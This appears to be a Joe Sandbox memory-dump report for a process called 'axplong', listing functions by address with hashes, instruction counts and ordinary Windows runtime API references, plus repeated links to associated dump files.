Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 82260cac88031403717aec34cdf3bba31d0a8d93898106f3aba9a38ed2a6e593
Instruction ID: 4cb6b5d9b3ed284b7a78b6d6630fc8075fea641a23a99599020662ac6d231716
Opcode Fuzzy Hash: 82260cac88031403717aec34cdf3bba31d0a8d93898106f3aba9a38ed2a6e593
Instruction Fuzzy Hash: 68C25E71E046388FDB25CE28ED407E9B7B5EB58309F1441EAD84DE7240E779AE858F60

Function 00D22BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 0a513303be21e6f4b8525d07d37f8adb04c708dd72e4311cbbe352ece4cb29c0
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 99F14071E002299FDF14CFA9D9806AEB7F1FF98314F15826AE915A7344D731AE41CBA0

Function 00CFCB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00CFCE82,?,?,?,?,00CFCEB7,?,?,?,?,?,?,00CFC42D,?,00000001), ref: 00CFCB33

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 96e69a9e2fa605495e2ac16f8ce1941863adc98149658f52764c53088b2a5483
Instruction ID: 8d5b4471c5c9927363bb53883318b8b096c424d6035c1739193e958bb952370f
Opcode Fuzzy Hash: 96e69a9e2fa605495e2ac16f8ce1941863adc98149658f52764c53088b2a5483
Instruction Fuzzy Hash: 06D0223A74363C93CA052B94BC088BDBB089A01B103500111EE09A3220CA105C008BE6

Function 00D17D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00D17EFF

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 82f77810d123e5cce0eca444b36350a86c64477185a9437f4f0c7eb4b3034410
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 3551346024C64AB6DB388A28B8967FE67FA9F51300F2C0459F882D76B2DE11DDC59271

Function 00CE4CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0652481412aee451177e93b49ba5f21a5ce41f6141767bcba27e9435f535809
Instruction ID: 1d1f39e47afbc8fcb8c70dcc1da659df152260d832c900cd964c73461356a9fb
Opcode Fuzzy Hash: b0652481412aee451177e93b49ba5f21a5ce41f6141767bcba27e9435f535809
Instruction Fuzzy Hash: FD2260B7F516144BDB0CCE9DDCA27ECB2E3AFD8214B0E803DA40AE3345EA79D9159644

Function 00D26F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb4e2645a5d22981d6273dd460211a7f7ae1d4121e8f8c17b5d1cdc76b3a286
Instruction ID: bcbee463eb4cef6473bb9ada970eeb7021565c1e57f2b4e959871a91bbb445da
Opcode Fuzzy Hash: 8fb4e2645a5d22981d6273dd460211a7f7ae1d4121e8f8c17b5d1cdc76b3a286
Instruction Fuzzy Hash: 9DB1AB31210618CFDB25CF28D486B657BB0FF15368F298658E8D9CF2A1C336E992CB50

Function 00CFD312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00CE247E

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 35f6fb5c28046aa94a21d41bfcbe631d4085576d021cb85f363b93e999bd9f27
Instruction ID: 67c8fe2958fdbd71fceee60bdd03072d487b6d59f74e676a1e6d4186944b8ec3
Opcode Fuzzy Hash: 35f6fb5c28046aa94a21d41bfcbe631d4085576d021cb85f363b93e999bd9f27
Instruction Fuzzy Hash: 9B51ABB1A007098FDB15CF59E8817BAB7F6FB08310F24856AD516EB295D730AA40CF72

Function 00CE4AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ffaf07eedd68ebdad1a7a7736a018bb9476953438c7bcd59f91a9102f88633
Instruction ID: 6c81df7f1d479866007fff1200bd9692d7bb9ef623d448259207fb86c2fc4955
Opcode Fuzzy Hash: 47ffaf07eedd68ebdad1a7a7736a018bb9476953438c7bcd59f91a9102f88633
Instruction Fuzzy Hash: B851B0706087D18FC319CF29811563ABBF1AF95201F084A9EE4E687292D775DA44CBA2

Function 00D38D70 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0cf21e906524e5d082cf88163f58692f7d293b3cb0ac4142f19ef771890846
Instruction ID: 8e6548576cbe72300e72192d31e0dde3a1925b05dcec1914060abf4cfd54e8c6
Opcode Fuzzy Hash: 9f0cf21e906524e5d082cf88163f58692f7d293b3cb0ac4142f19ef771890846
Instruction Fuzzy Hash: D4419F6284E3D54EC703873449390927FB06E23104B1E49DFE4C2EB0F3D659991AE367

Function 00D2777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08272797ef95b5c5c73fae56933c20e83511c1205ecc23d685cd6cdb25b46200
Instruction ID: c7ae1dd3902f242e359de6e8f51eb05c579c1d75eedc06518e029ab3b4679672
Opcode Fuzzy Hash: 08272797ef95b5c5c73fae56933c20e83511c1205ecc23d685cd6cdb25b46200
Instruction Fuzzy Hash: 8A21B673F205394B770CC47E8C5727DB6E1C78C541745423AE8A6EA2C1D968D917E2E4

Function 00D2765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdcadc43a55ff88fe24847a58905fca32f68a5efc4ccfbc8a3a6dadf973e24bd
Instruction ID: 45bb74f68c5857875998ddbd81ec81209aebd7495c86c1668cbfcda2dec7d0bc
Opcode Fuzzy Hash: bdcadc43a55ff88fe24847a58905fca32f68a5efc4ccfbc8a3a6dadf973e24bd
Instruction Fuzzy Hash: F6118A23F30C355B675C817D8C1727AA5D2DBD825471F533AD826E7384E994DE23D2A0

Function 00D28720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 839f82f953b6961de00e1a12c50050f802e7e067cc14ca473b9c3027bfb65eb8
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: A911387B20317143D6048A2DF8F45B6A796EAF5329B3C437AC0424B758DA32E945FA20

Function 00D1645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a894e48720208e6e6ff806a800784234262dcbaf9162814e3ba678a6ce0470e
Instruction ID: 51b56fed976d158725c5e6212cc09c367dd6612d2803db68c58011a3efb4e2a3
Opcode Fuzzy Hash: 7a894e48720208e6e6ff806a800784234262dcbaf9162814e3ba678a6ce0470e
Instruction Fuzzy Hash: 31E046302416087FCA26BB18E85DEC93B5AEB51350F149814F80846221CF35EDC1CAA0

Function 00D1A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 62497c080df35baae4e93c34a3d501ebe5f4e446ca462375caf620058a3b9ba0
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 7DE04672A52228FBCB16DB8CD90498AF2ACEB48B10F154096B501D3240C670DF80C7E0

Function 00CE2E80 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00CE2F1F
GetCurrentThreadId.KERNEL32 ref: 00CE2F3E
__Mtx_unlock.LIBCPMT ref: 00CE2F8C
__Cnd_broadcast.LIBCPMT ref: 00CE2FA3
__Mtx_unlock.LIBCPMT ref: 00CE30B5
GetCurrentThreadId.KERNEL32 ref: 00CE30F2
__Mtx_unlock.LIBCPMT ref: 00CE315B

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
